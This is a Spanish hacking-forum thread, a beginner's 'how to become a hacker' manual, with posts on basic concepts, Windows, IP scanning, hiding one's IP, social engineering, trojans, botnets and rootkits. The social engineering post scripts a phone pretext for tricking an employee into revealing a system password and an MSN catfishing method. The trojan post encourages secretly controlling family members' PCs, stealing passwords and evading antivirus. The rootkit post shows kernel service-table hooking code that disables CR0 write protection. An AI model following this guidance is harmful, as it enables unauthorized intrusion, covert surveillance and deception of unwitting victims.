02/09/2014, 04:10:44 am

Autor Tema: Manual ¿Como convertirse en Hacker? [EN CONSTRUCCION]  (Leído 161691 veces)

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Manual Como convertirse en Hacker
Hola a Todos Mi nombre es fNiX y aqui­ tienen una gui­a que los ayudara a convertirse en hacker, les digo de antemano que no seran hackers de un di­a para otro es un proceso largo que toma bastantes años, si lei­ste bien son años de aprendizaje y de lectura, bastante teori­a y bastantes conceptos son los que debemos aprender pero todo esto vale la pena.

Quiero dejar claro que aprender al 100% todo lo nombrado aqui­ cuesta bastante tiempo, por lo que los verdaderos hacker osea los que dominan todo al 100% son bastante pocos ya que muchos de los que empiezan en el mundo del hacking por lo general dominan un troyano y luego se van, espero amigos que ustedes no sean de ese estilo, que amen el hacking como todos los que estan aqui y que nunca dejen de aprender. Bueno aqui­ en esta gui­a colocare todo lo esencial, colocare todo lo que pueda con la intencion de facilitarles a todos el aprendizaje, espero que sea de su agrado y que lo disfruten.
You are not allowed to view links. Register or Login

Indice

1-Introduccion
You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

8-Borrando Huellas
You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

10-Analisis Forense
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

10-Cryptografia y Encriptacion
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
[en construccion]

11-Hacking Wireless
11.1- intro y conceptos basicos
a.   Lan
b.   Man
c.   Wan
d.   wireless
e.   MODEM
f.   Router
g.   Tarjetas de red
h.   Fibra optica
11.2- Hacking wireless general
b.   Entrando en Materia
c.   Maneras de proteger una red WIFI
d.   Caso Práctico: sacando la clave wep en Linux sin instalaciones
e.   Vulnerabilidades del cifrado WEP
f.   seguridad en redes Wifi en Windows
g.   Inyeccion de trafico en Windows para acelerar el crackeo de la clave WEP
h.   Manual seguridad en redes inalámbricas (wireless)
i.   Comandos basicos para linux-wireless-principiantes
j.   Interpretando los paquetes capturados con Airopeek
[en contruccion]

11-Desarrollo Web
10.1 Introduccion al Desarrollo Web
10.2 como ser un Web Master desde 0¿?
10.3 HTML
10.4 PHP
10.5 MySQL
10.6 javascript
10.7 asp

12-Programacion
11.1 You are not allowed to view links. Register or Login
11.2 c /c++
11.2 You are not allowed to view links. Register or Login
11.3 Visual Basic
11.4 You are not allowed to view links. Register or Login
11.5 Perl

11.6 You are not allowed to view links. Register or Login
« Última Modificación: 27/09/2011, 04:59:06 pm por ZeroMercy »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Conceptos Basicos
« Respuesta #1 : 21/07/2008, 09:20:14 am »
Conceptos Basicos
2.1 Definiciones
Como decia el Viejo Socrates, empezemos por la definicion.

Hacker: Hacker es el concepto utilizado para referirse a un experto  en varias o alguna rama tecnica relacionada con la informatica: programacion, redes de computadoras, sistemas operativos, hardware de red/voz, etc. Se suele llamar hackeo y hackear a las obras propias de un hacker.

Cracker: Un cracker es algo parecido al hacker. El cracker es alguien capaz de violar la seguridad informatica de un sistema, pero a diferencia del hacker, este lo hace con la intencion de hacer daño, o como beneficio personal.

Noob: este termino es aplicado a un novato que postea incorrectament e, fuera de lugar, incumple las normas y/o falta al respeto a otros usuarios. Es rechazado por los demas usuarios, recibira ignorancia y malas contestaciones a sus posts y seguramente sera banneado por el administrador. Suele ser tambien un spammer y/o flooder

Newbie: o tambien novato. Es un usuario recien llegado al foro. Postea correctamente y se integra sin problemas en el ambiente del foro, por lo que pasado cierto tiempo sera un usuario normal del foro

Flood: significa colocar muchos mensajes de seguido en un foro. Casi siempre es referido a colocarlos uno tras otro, pero tambien se puede considerar flood cuando 2 o mas usuarios colocan mensajes cortos para hablar entre ellos, como si fuese una conversacion en tiempo real. Una persona que hace flood se la denomina flooder. Un flooder suele ser tachado de querer conseguir aumentar a toda costa su marcador de mensajes puestos en el foro

Lamer: Un lamer es alguien inmaduro, que se las da de hacker, cuando en realidad, lo unico que hace es seguir los pasos de lo que dicen los manuales, sin molestarse en aprender el porque de las cosas, y despues, va fardando de que lo ha conseguido, y acreditandose meritos que no son suyos. En muchas ocasiones plagiando manuales y diciendo que han sido creados por el.

Troll: se trata de un mensaje en contra de la tematica del foro, es de una tonalidad hostil y provocativa, y suele provocar una grave e inutil discusion. Tiene como fin causar un mal ambiente y/o interrumpir un tema. Puede ser el principio de un tema o aparecer en medio de un hilo ya iniciado. Tambien se denomina troll a la persona que postea un mensaje de este tipo

Si quieres ver mas conceptos los puedes ver You are not allowed to view links. Register or Login

2.2 Cosas Del Hacking
Estas son algunas cosas que debemos de conocer Del Hacking
Kevin Mitnick:

Kevin Mitnick (nacido el 6 de agosto de 1963) es uno de los hackers y phreakers mas famosos de los Estados Unidos. Su ultimo arresto se produjo el 15 de febrero de 1995, tras ser acusado de entrar en algunos de los ordenadores mas "seguros" de EE.UU. Ya habi­a sido procesado judicialmente en 1981, 1983 y 1987 por diversos delitos electronicos.

Para Saber mas sobre Kevin Mitnick puede verlo You are not allowed to view links. Register or Login

Glider:

El glider, el emblema hacker aceptado mayoritariamente

HOYGAN:
Segun la wikipedia!
HOYGAN u HOIGAN es un neologismo nacido en Internet con el que algunos describen de forma parodica a los usuarios que, por descuido o por presumible bajo nivel cultural, escriben en los foros con multitud de faltas de ortografi­a. Ademas de los errores ortograficos y gramaticales, escriben a menudo para pedir cosas imposibles, para solicitar regalos que nadie les va a enviar o para que les presten algun tipo de ayuda.

Aunque naturalmente hay usuarios del tipo HOYGAN en todas partes, se supone que el nombre "hoygan" en vez de "hoyd" se debe a que estos usuarios abundan mas en Hispanoamerica, aunque tambien se usa ustedes para la segunda persona en algunas zonas de España.

Ejemplos

    * "Nesecito saver donde vajar la pelicula de hestar wars gratix" (Necesito saber donde bajar la peli­cula de Star Wars gratis)
    * "Kiero jakear el jotmail" (Quiero hackear el Hotmail)
    * "OYAN POR FABOR ME PUDEIS PASAR EL KRAK DER GUEGO DE GERRA ? GRACIAS DE ANTEBRAZO" (Oigan, por favor, ¿me podeis pasar el crack del juego de guerra? Gracias de antemano)

--------------------
Ahora bien.. en nuestro caso.. en nuestros foros! o desde mi punto de vista!
Yo aplico este termino para gente que pregunta cosas como las siguientes:
 
-> " Necesito un programa para hackear" (hackear que? nisiquiera saber que es hacking)
-> "Como hackear hotmail" ( si no sabes de bugs y exploits, No sabes ni que es hackear hotmail, piensas que aplicar ING social es hackear)
-> "Quiero ser hacker" (nadie quiere ser hacker asi por asi... si sabes de informatica y te gusta este mundillo, simplemente aprendes y lees de los demas... No existe esa famosa Super Miniguia para ser un hacker)

2.3 Etica Hacker
En el mundo de la seguridad informatica, en el underground, representa la posibilidad de mostrar a una vi­ctima cuales son sus debilidades y vulnerabilidades con una prueba visual, no hay nada mas impactante, os lo podemos asegurar.

Antes de entrar de lleno en la cuestion, es interesante definir un par de figuras que se relacionan con el termino de hacking etico: los hackers de sombrero blanco (white hat) y sombrero negro (black hat). Los hackers de sombrero negro son aquellos que intentan provocar un daño explotando una vulnerabilidad existente en un determinado sistema. Los hackers de sombrero blanco son aquellos que intentan mostrar el daño que causari­a la explotacion de una determinada vulnerabilidad en un sistema.

Para leer mas sobre el Hacking Etico puedes mirarlo You are not allowed to view links. Register or Login
« Última Modificación: 03/10/2008, 08:12:50 pm por fNiX »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Conociendo Nuestro Sistema Operativo
« Respuesta #2 : 21/07/2008, 10:02:18 am »
Conociendo Nuestro Sistema Operativo
En el mundo del Hacking mis queridos amigos es muy importante dominar nuestro sistema operativo al 100%, no podemos hackear algo que no conocemos, ademas muchas cosas de nuestro sistema operativo nos seran muy utiles para poder entrar a otros ordenadores y para nosotros tambien poder saber defendernos.

3.1 ¿Que es un Sistema Operativo?
Un sistema operativo es un software de sistema, es decir, un conjunto de programas de computadora destinado a permitir una administracion eficaz de sus recursos. Comienza a trabajar cuando se enciende el computador, y gestiona el hardware de la maquina desde los niveles mas basicos, permitiendo tambien la interaccion con el usuario.


Si quieres saber mas a fondo que es un sistema operativo lo puedes ver You are not allowed to view links. Register or Login

3.2¿que es windows?¿que es linux?
Windows es una familia de sistemas operativos desarrollados y comercializados por Microsoft. Existen versiones para hogares, empresas, servidores y dispositivos moviles, como computadores de bolsillo y telefonos inteligentes
Ejemplo de un escritorio de Windows:


Linux (tambien conocido como GNU/Linux) es un sistema operativo tipo Unix que se distribuye bajo la Licencia Publica General de GNU (GNU GPL), es decir que es software libre. Su nombre proviene del Nucleo de Linux.
Ejemplo de escritorio de Linux:


You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

3.3 Registro de Windows
El registro del sistema, o registro de Windows, es una base de datos que almacena las configuraciones y opciones del sistema operativo Microsoft Windows
Para acceder a el Registro desde Nuestro ordenador debemos de hacer lo siguiente:
(Inicio --> Ejecutar --> Regedit) y se nos aparecera esta imagen:


Podemos ver que nuestro Registro se encuentra MI PC como la cabeza.
luego debajo vemos 6 subarboles, y estos 6 subarboles se dividen en claves
y las claves se dividen en sub claves, aqui en los foros de hacking
se habla con el termino de "ramas" .

un ejemplo de como actua el registro de windows es el siguiente:
vamos a la rama
HKLMachine\Software\Microsoft\Windows\CurrentVersion\Run
en esta rama estan las cosas que se inician con windows
para que me entiendan, es como cuando uno prende su ordenador
y inmediatamente se les abre el antivirus, ustedes lo abrieron?
no, se inicia con windows, esto es bastante util.
y bueno muchas cosas mas del registro nos pueden ser Utiles.

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

3.4 Firewall de Windows
El Firewall de windows nos ayuda con la proteccion de nuestro sistema operativo, su funcion en nuestro ordenado es supervisar la informacion que pasa entre nuestros ordenadores y internet. nos puede ayudar al momento de que alguien quiera entrar a nuestro ordenador, y en algunos casos bloquea programas sospechosos o que posiblemente tengan un uso que nos pueda perjudicar.



Mas Informacion Sobre el Firewall de Windows You are not allowed to view links. Register or Login

3.5 Antivirus y Seguridad Informatica
Los antivirus son una parte importante en el mundo del hacking.
en ciertas ocaciones son nuestros amigos, pero en las otras son nuestros enemigos.
debemos de saber como funcionan los antivirus para poder evitarlos.


Ahora algo sumamente importante es como poder protejer nuestro sistema operativo:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

3.6 TODO SOBRE EL MS-DOS
esto lo tenemos que dominar al 200% ya que es algo sumamente necesario
para llegar al MS-DOS debemos de hacer esto:
(inicio-->ejecutar-->cmd) nos aparecera una ventana como esta:

para aprender a usar el MS-DOS podemos aprender a usarlo aqui:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login <-- MS-DOS usandolo para programar
« Última Modificación: 29/11/2008, 10:29:14 am por fNiX »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Protocolos
« Respuesta #3 : 22/07/2008, 08:43:09 am »
Protocolos
4.1 ¿que es una IP?
una ip es una direccion, para identificar un equipo que se conecta a internet hay diferentes tipos de IP, es como la direccion donde vives que cuando te mandan un paquete por coreo, debes de dar para que el cartero sepa donde vives y pueda entregarlo,  pues mas o menos asi es el principio del direccionamiento IP.
Si deseas Saber mas sobre IP puedes verlo You are not allowed to view links. Register or Login

4.2 ¿como obtener una ip?
Bueno mis queridos amigos obtener una IP nos puede ser muy util, existen muchas maneras de obtener una IP pero yo en lo personal para aprender como sacar una IP recomiendo este manual:
You are not allowed to view links. Register or Login


4.3 TODO lo que se puede hacer con una IP
bueno primero que todo les digo que con una IP podemos hacer muchas cosas
los cyber policias encuentran pedofilos o cyber criminales por medio de la IP.
ahora explicare todo lo que podemos hacer con una IP:

1-Geolocalizar una IP
Aqui enseñare como podemos  localizar una IP osea saber su pais,ciudad,empresa,etc
Para poder saber todo esto debemos entrar a esta pagina -->You are not allowed to view links. Register or Login
Cuando entremos nos va a salir los datos de nuestra IP y un mapa con nuestra localidad ^^
una vez que estamos en la pagina hacemos clic en donde dice esto:
For IP to Location, IP Tracing, Broadband Speedtest and more tools click here
y luego colocamos la IP que queremos Localizar:


2-Escanear IP
Con esto mis queridos amigos podemos saber que Sistema Operativo usa y que puertos tiene abiertos.
esto nos puede ayudar mucho mas adeltante, asi que pongan mucha atencion.
Para esto necesitamos ocupar nuestro querido amigo You are not allowed to view links. Register or Login
Una vez que lo descomprimimos lo debemos de colocar en esta direccion --> c:\nmap
Luego en nuestro cmd debemos de colocar:

De esta manera nuestro cmd se ubica donde se encuentra el Nmap.
Luego colocamos esto en nuestro cmd:
Citar
nmap -A IP
y de esta manera podremos saber que puertos tiene abiertos
y si sabemos como explotar el puerto podemos tener control sobre el PC.

NOTA IMPORTANTE:
con la IP podemos hacer muchas mas cosas, pero eso lo explicare en la parte
de la guia "7 intruciones/ataques" para que la guia tenga mas orden.

4.4 TCP/IP
Juntos los protocolos TCP e IP conforman un protocolo o mas bienn un conjunto de protocolos estandares para la comunicacion entre pcs, cada uno tiene una funcion diferente, el TCP se encarga de el flujo de datos, y el IP se encarga del direccionamiento de dichos datos o paquetes.
Este tema es bastante extenso, y puedo seguir hablando de TCP/IP  por eso les recomiendo
que para profundisar mas en el tema de TCP/IP lean este manual:

You are not allowed to view links. Register or Login

4.5 ¿como ocultar la IP?
Bueno amigos, quiero decirles primero que esto es algo muy necesario
ya que mas adelante cuando hagamos ataques en muchas ocaciones
nos sera util ocultar nuestra IP, para que no nos descubran.

Forma facil de ocultar la ip
bueno pues
con esto podemos ocultar nuestra ip

Herramientas:
TOR
Mozilla FireFox


primero necesitamos vidalia (TOR)

y lo descargamos de aca-->You are not allowed to view links. Register or Login

Ya una vez descargada la instalamos y nos quedara algo como esto..



Si todo va bien hasta aqui­ ahora descargamos este plugin para firefox...

You are not allowed to view links. Register or Login

Lo instalamos y despues reiniciamos firefox, nos debera salir esto en la esquina inferior derecha del navegador...



Solo damos un click izquierdo con nuestro Mouse para activarlo y ya debemos de tener nuestra ip oculta...



y ahora, para comprobar...

entramos a You are not allowed to view links. Register or Login

Y si queremos renovar nuestra identidad solo damos un click en nueva identidad...

Bueno eso es todo, la unica desventaja de trabajar con proxys es que nuestra navegacion se vuelve mas lenta asi­ como las descargas debido a que se crea una red virtual entre nosotros y la red...
Post Original --> You are not allowed to view links. Register or Login

Y si desean Ocultar Su Ip en Linux:
You are not allowed to view links. Register or Login

Trafico TCP/IP
You are not allowed to view links. <a href="http://foro.infiernohacker.com/index.php?action=register">Register</a>&nbsp;or&nbsp;<a href="http://foro.infiernohacker.com/index.php?action=login">Login</a>
un exelente video que explica de manera entretenida los conceptos TCP/IP
« Última Modificación: 22/11/2008, 03:56:06 pm por fNiX »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Ingenieria Social
« Respuesta #4 : 11/10/2008, 09:40:34 pm »
Ingenieria Social - "Hackeando al humano tras la pantalla"
¿Que es esto?¿Que voy a aprender con este paper?
Este paper es una introduccion al arte de la ingenieria social, no esperes ningun metodo revolucionario o magico. Con esto aprendar las normas basicas sobre este tema y podras formular tus propios metodos. Queda mas que claro que este documento es solo educativo, no me responsabilizo por el futuro uso del conocimiento aqui adquirido.



5.1¿Ingenieria Social?
La ingenieria social se usa desde hace mucho antes que todo esto del [wiki]hacking[/wiki], esto comenzo en otra subcultura underground llamada [wiki]phreaking[/wiki] .En esta area la ingenieria social era utilizada para conocer datos sobre las operadoras de Telefono o para obtener contraseñas o numeros internos de las compañias de telefonia de la epoca.
En fin la ingenieria social consiste en inducir a una persona a hacer algo que nosotros queremos. Por ejemplo para dar un ejemplo practico para darnos su clave de msn. El "arte" de la manipulacion requiere sobre todo de imaginacion e inmersion en el papel que hagamos.
Cabe destacar que la ingenieria social se puede aplicar en todo tipo de medios, ya sea telefono, mensajeria instantanea (msn por ejemplo), mail, en persona (esto requiere mas experiencia pero tambien es una opcion) y muchos mas. Las posibilidades son casi infinitas.
Recuerden esta frase... "La debilidad mas grande de un sistema no esta en las computadoras sino en los humanos que las manejan"



5.2Comenzando

Para introducirnos en este mundo les hare un dialogo de ejemplo de una conversacion, en este caso telefonica donde un individuo tratara de convenser a una operadora de una empresa de que le de la contraseña de acceso del sistema. (Todo ejemplo aqui expuesto es solo ilustrativo, no es para que vallas usandolo y nunca se den cuenta, estos son solo producto de mi imaginacion para mostrarles ejemplos practicos).

Operadora: Hola si, administracion miguel y asociados, en que puedo ayudarle?
Atacante: mire soy alejandro rolando del personal del sector de informatica, se me rompio el telefono movil y no he podido ingresar al sistema para verificar el firewall externo y la ventilacion del servidor principal (Siempre usa vocavulario tecnico o incluso inventos que suenen tecnicos, te hacen dar una imagen de profesionalidad y credibilidad. Es muy importante no lo olvides de esa forma de enserio pensaran que eres de esa area.)
Operadora: En que podria yo ayudarle???
Atacante: Lo mas facil seria que me facilite la nueva contraseña asi yo podria ingresar y seguir con mi trabajo antes de que el supervisor me presente una sacion por no haber estado activo estos ultimos 2 dias.
Operadora: No estoy segura, esto tal vez deba hablarlo con el tecnico de turno asi podrian llegar a un acuerdo. (Descuida siempre surgen imprevistos, en estos casos inventa evasivas y trata de siempre hablar con gente "ignorante" en el tema, hablar con alguien que sabe tanto o mas que tu seria lo peor que te puede pasar)
Atacante: No, porfavor le avisara al supervidor y esto puede costarme el empleo.
Operadora: De acuerdo, dejeme su telefono y le avisare cuando consiga la contraseña para que pueda volver al trabajo (No conviene nunca dejar inf. personal cuando haces ing. soc., en estos casos puedes crearte por ej una direccion de correo para la ocacion, tal como en este caso podria ser You are not allowed to view links. Register or Login)
Atacante: No creo estar disponible para una llamada, pero podria enviarmelo a mi casilla de mail?
Operadora: de acuerdo, deje su mail.
Atacante: You are not allowed to view links. Register or Login
Operadora: Bueno muchas gracias, en breve tendra su respuesta.
Atacante: exelente, adios que tenga buen dia.


Creo que con este ejemplo queda bien claro lo que trataremos. Un punto importante en la ingenieria social y mas si es por telefono, es la naturalidad al hablar. Nunca debemos ponernos nerviosos y debemos anticipar todo lo que nos pueda decir el otro. Como casi todo, debes practicar mucho antes de lanzarte a la practica, una buena ayuda es provando primero con amigos o talvez pequeños locales como almacenes para "entrar en calor" no seria para nada sensato provar de entrada con una empresa. Ademas que si cometes algun error con una empresa y te descubren es muy posible que te rastreen, por eso tambien es muy importante dejar la menor informacion real posible.



Otros metodos y consideraciones
Otro metodo factible y muy de moda, es la ingenieria social por msn. Basicamente esta consiste en 4 pasos:
1. Crear un msn ficticio.
2. Conseguir una serie de fotos (de chicos o chicas dependiendo con quien vamos a usar el metodo. Otra cosa, por mas que lo tomo como sobreentendido y es sentido comun, las fotos deben ser de la misma persona no sirve tener 3 fotos de distintas personas) para nuestro avatar o simplemente para pasarle al contacto
3. Preparar el msn para que quede como uno de verdad, agregandole un nombre adecuado, un buen avatar (vease punto 2) y otros detalles o consideraciones personales.
4. Agregar al contacto


Luego de esto, solo basta con convenser al otro desde el principio, dandole cierta seguridad de que te conoce aunque no te tiene presente. Como logramos esto??
Bueno por ejemplo cuando lo agregamos nos dice (esto pasa el 99.9999999% de las veces) "Quien eres?? quien te ha dado mi msn???". En este caso particular, le damos el nombre que hemos elegido e inventamos una situacion falsa tal como... "soy romina, no recuerdas??? nos conocimos en la disco el sabado pasado, anotaste tu msn en mi brazo" o "soy romina, amiga de sofia, me dijo que eras un chico muy apuesto y que podria charlar contigo sin tener ningun problema". Alagar a nuestro contacto tambien es un elemento poderoso, lo hara ganar confianza y pensar que de verdad esta llevando la situacion.



Asi como estos ejemplos aqui enunciados hay miles que puedes ver en internet o miles mas que se te pueden ocurrir. Algo que te aseguro es que nunca vas a encontrar una "guia para la ingenieria social" porque la ingenieria social es algo que sale de uno mismo, lo que trato con este breve (pero servicial y eficiente, segun mi punto de vista :P) texto es guiar para que puedan comenzar a pesar y a perfeccionar sus propios metodos. "Solo te puedo mostrar el camino, a ti te toca recorrerlo"




5.3 Lecturas recomendadas

The Art Of Deception - [wiki]Kevin Mitnick[/wiki] (Recomendado)

You are not allowed to view links. Register or Login



The Art Of Intrusion - Kevin Mitnick

You are not allowed to view links. Register or Login



By Holyknight - You are not allowed to view links. Register or Login 100% Produccion propia. Prohibido el Copy & Paste. Pedir autorizacion para postearlo en otro sitio, foro o similares.

Ingenieria Social - "Hackeando al humano tras la pantalla" by Holyknight is licensed under a Creative Commons Reconocimiento-No comercial-Sin obras derivadas 3.0 Unported License.
Based on a work at You are not allowed to view links. Register or Login.

You are not allowed to view links. Register or Login
« Última Modificación: 11/10/2008, 09:53:08 pm por fNiX »

Desconectado fNiX

  • IH | Ex Staff's
  • User Infernal
  • *
  • Mensajes: 573
    • para no olvidar xD
Administracion Remota
« Respuesta #5 : 11/10/2008, 09:51:56 pm »
Administracion Remota
La adminitracion Remota es controlar otro PC a distancia, osea poder manipular la PC de otra persona, existen muchos sofwares que nos permiten eso, incluso el mismo windows tiene incorporado la administracion Remota, pero para eso los 2 ordenadores deben de estar de acuerdo, la idea es poder controlar el PC de tu hermana, hermano, primo, tio, amigo, enemigo, papa, mama, perro, [pero sin que ellos sepan]

Para eso existen nuestros queridos amigos Los troyanos

6.1 Troyanos
¿PARA QUE PUEDO USAR UN TROYANO?

Un troyano te permite controlar la PC de otra persona remotamente.
Podras ver lo que este haciedo, controlar todo lo que escriva, robarle, borrarle, cambirle de nombre, y subirle archivos, programas, fotos o lo que quieras... ver la informacion de su sistema, entrar en su registro, en la consola...etc.

Para aquellos que se pregunten si pueden sacar pass de hotmail con uno, la respuesta es SI. You are not allowed to view links. Register or Login

¿De que partes consta un troyano?

Un troyano consta principalmente de 2 partes. Una se llama cliente.exe y otra server.exe (el server lo devereis crear ustedes mismos)

cliente.exe este es el archivo que devereis ejecutar en vuestra PC y con el cual controlareis a vuestras victimas

server.exe es el archivo que deveis de enviar y vuestras victimas devern ejecutar. Una vez ejecutado, ya  podreis controlar remotamente su PC

Algunos troyanos pueden incorporar algun otro programa como un editserver.exe o similar, pero eso de momento no nos interesa

¿Que tipos de troyanos existen?

Pues existen dos tipod de troyanos. Los de conexion directa e inversa.

Los de conexion inversa son los mejores, puesto que se conectan a tu PC sin necesidad de tener que conocer la IP de tu victima. Es decir, una ver tu victima ejecute tu troyano, ya no lo tendra que volver a acer puesto que este ara que la victima se conecte a tu Pc automaticamente

Los de conexion directa son algo mas complicados de mantener a la victima, puesto que tras enviarle el server, despues deveremos meter su ip para conectarnos a el y poder controlar a nustra victima. Pero claro, el problema esta en que deveremos averiguar la ip de nuestra victima, y que como las ip cambian.. la tendremos q averiguar una y otra y otra vez...

Para aprender mas sobre troyano leer este post:
You are not allowed to view links. Register or Login

6.2 Botnet
El artífice de la botnet puede controlar todos los ordenadores/servidores infectados de forma remota y normalmente lo hace a través del IRC. Sus fines normalmente son poco éticos.
En la botnet, los bots son igual que las víctimas de los troyanos, a los cuales, podremos controlarles, según las características del troyano que hayamos creado o descargado. Podremos usar el keylogger, ver la info del PC…etc.

Podemos ver como crear una botnet You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

6.3 Rootkits
You are not allowed to view links. Register or Login

Hoy abordaré otro interesante tema: los rootkits, el tema es trillado así que brincaré definiciones y ejemplos ficticios de su utilización para pasar directamente al funcionamiento interno de estas importantes herramientas, las cuales no solo funcionan como troyanos a nivel kernel: su importante uso compromete el sistema de manera irreparable, por ello es de suma importancia conocer su funcionamiento no solo para lograr defendernos... sino para lograr alterar su composición básica y lograr la mutación adecuada asegurando el acceso al sistema comprometido en distintas ocasiones.

Para esto me centraré en los rootkits que tienen como target principal los sistemas Windows. La actividad básica que realiza un rootkit para su correcto funcionamiento son la desactivación del registro de sucesos en el sistema para un usuario determinado (Administrator) refiriendose a la auditoria interna, permite el acceso al sistema como administrador utilizando un usuario/contraseña oculto. Desactiva de manera directa la seguridad mediante la aplicación parches en el kernel, tratandose esta, la acción mas disruptiva y sensible en la manera de operar de todo rootkit. Mediante estas actividades se asegura que el sistema vulnerado podrá ser accesado de nuevo por el intruso, sin que este de señales de alerta.

Para llevar a cabo estas tareas un rootkit posee un conjunto de herramientas las cuales son capaces de sustituir los archivos binarios por otros troyanizados, esto no es dificil de creer pues un rootkit se ejecuta una vez obtenida la cuenta de Administrador, lo cual permite sobreescribir y manipular los ejecutables del sistema.

Ahora bien, para lograr su cometido todo rootkit primero requiere ocultarse al sistema fuente. para ello realiza la captura de funciones a nivel sistema (INT2Eh). Las llamadas indispensables que se capturan para después troyanizarlas son las siguientes:

- ZwCreateFile
- ZwOpenFile
- ZwQueryDirecto ryFile
- ZwOpenProcess
- ZwQuerySystemI nformation

A nivel programación esto se logra en la gran mayoria de los casos con ansi C incrustando código ASM donde este último es el verdadero malicioso, este es un fragmento de código con el cual se realiza una captura de una llamada a sistema:

mov eax, 0x0000001A
lea edx, [esp+04]
int 0x2E
ret 0x2C

donde:

EAX --> Es el identificador de la funcion.
EDX --> Es un puntero a los parámetros en la stack.

Básicamente se deposita la dirección base de la IDT en la localización especificada en el segundo parámetro indicado por esp, a partir de la base se puede indexar el descriptor de una interrupción, manipulando su selector y su desplazamiento . Una vez alcanzado este nivel de privilegios, el sistema depende por completo de los descriptores y sus posibles desplazamiento s llevados a cabo por el rootkit mediante el programa especifico destinado para esta función.

Las APIs de KERNEL32 son un envoltorio entorno a las APIs de NTDLL, mucho más primitivas. Por lo tanto cada servicio del sistema posee un identificador.

 12bit > Identificador del servicio.
 2bit > Tabla de servicios a emplear.
 0 > Servicios del núcleo (NTDLL).
 1 > Servicios del entorno gráfico (WIN32K).
 2 y 3 > No se emplean.
 18bit > Reservados

este identificador es utilizado por el rootkit para manipular e interceptar el servicio objetivo, para ello el código de una función comienza cargando dicho identificador del servicio en EAX, sabiendo esto de antemano la línea básica para lograr esto sería:

 MOV EAX,id ; A5h XX XX XX XX

Ahora bien, cual es el verdadero proposito de todos estos conceptos? pongamos un ejemplo práctico, supongamos que deseamos ejecutar Vanquish Rootkit en un sistema Windows Server Enterprise 2003 R2, recién parcheado por el administrador de sistemas y puesto a disposición de un IPS, que pasaría al tratar de instalar nuestro rootkit? quizá la instalación procederia sin ningún problema pues el IPS entra en acción una vez que el los ejecutables que forman el rootkit comienzan a aplicar el payload, una vez instalado sería inútil pues Vanquish realiza la captura de las funciones del sistema alterando la tabla de servicios, para evitar esto Microsoft decidio denegar el acceso a la escritura a partir de Windows XP el cual es el sistema mas atacado pues es un blanco mas común entre intrusos. La versión Server de windows 2003 es una versión mucho mas robusta y modular de este SO que permite la ejecución de llamadas a sistema permitiendo sobreescribir el id de urgencia, pues son equipos que regurlarmente son conectados a otros equipos de storage. Los cuales requieren altos privilegios cuando realizan replicaciones relacionadas no solo con el storage sino también con el SO.

Debuggeando un poco un agente de storage podemos percatarnos que en algunos casos, estos desactivan la protección de escritura en el registro de control CR0 para realizar funciones de mantenimiento, esto  "supuestamente" es información confidencial de los fabricantes, pero al instalar dichos agentes es bastante predecible que lo hacen pues tratandose de storage de alto rendimiento Hitachi, EMC y SUN apuestan a la constancia en linea de sus equipos de storage que a la seguridad aplicativa/abstractiva... debuggeando un poco un agente de storage del cual guardaré su confidencialid ad, encontramos lo siguiente:

 #define WPOFF() \
 _asm mov eax, cr0 \
 _asm and eax, NOT 10000H \
 _asm mov cr0, eax

 #define WPON() \
 _asm mov eax, cr0 \
 _asm or eax, 10000H \
 _asm mov cr0, eax

*Obtenido con CDB.

Esto es, la desactivación de la protección y escritura del registro de control CR0, basta crear las macros para su ejecución y despues modificar a nuestro gusto la tabla de servicios de la siguiente manera:


   DbgPrint( ( "GKit: HookSystemServ ice() Hooking SST %x Index %03x Old %08x\n",
   ulSST, ulIndex, ( ULONG) pfnOldHandler)) ;
   __try
   {
      WPOFF() ;
      pfnOldHandler = InterlockedExc hangePointer( pfnHandler, pfnNewHandler) ;
      WPON() ;
      DbgPrint( ( "GKit: HookSystemServ ice() Done\n"));
      //Si funciona
   }
   __except( EXCEPTION_EXEC UTE_HANDLER)
   {
      pfnOldHandler = pfnHandler ;
      DbgPrint( ( "GKit: HookSystemServ ice() Hook failed - can't write\n")) ;
      //No funciona
   }

No trataré de explicar el código anterior pues es muy predecible y esta no es el objetivo de este paper, empero, basta observar la función hook con la cual se parchea la tabla. Esto es lo que haría un rootkit luego de desactivar los registros de control, los cuales, en muchos sistemas se encuentran desactivados por software propietario de storage los cuales en algunas ocasiones hay que conocerlos para simplificar nuestro trabajo.

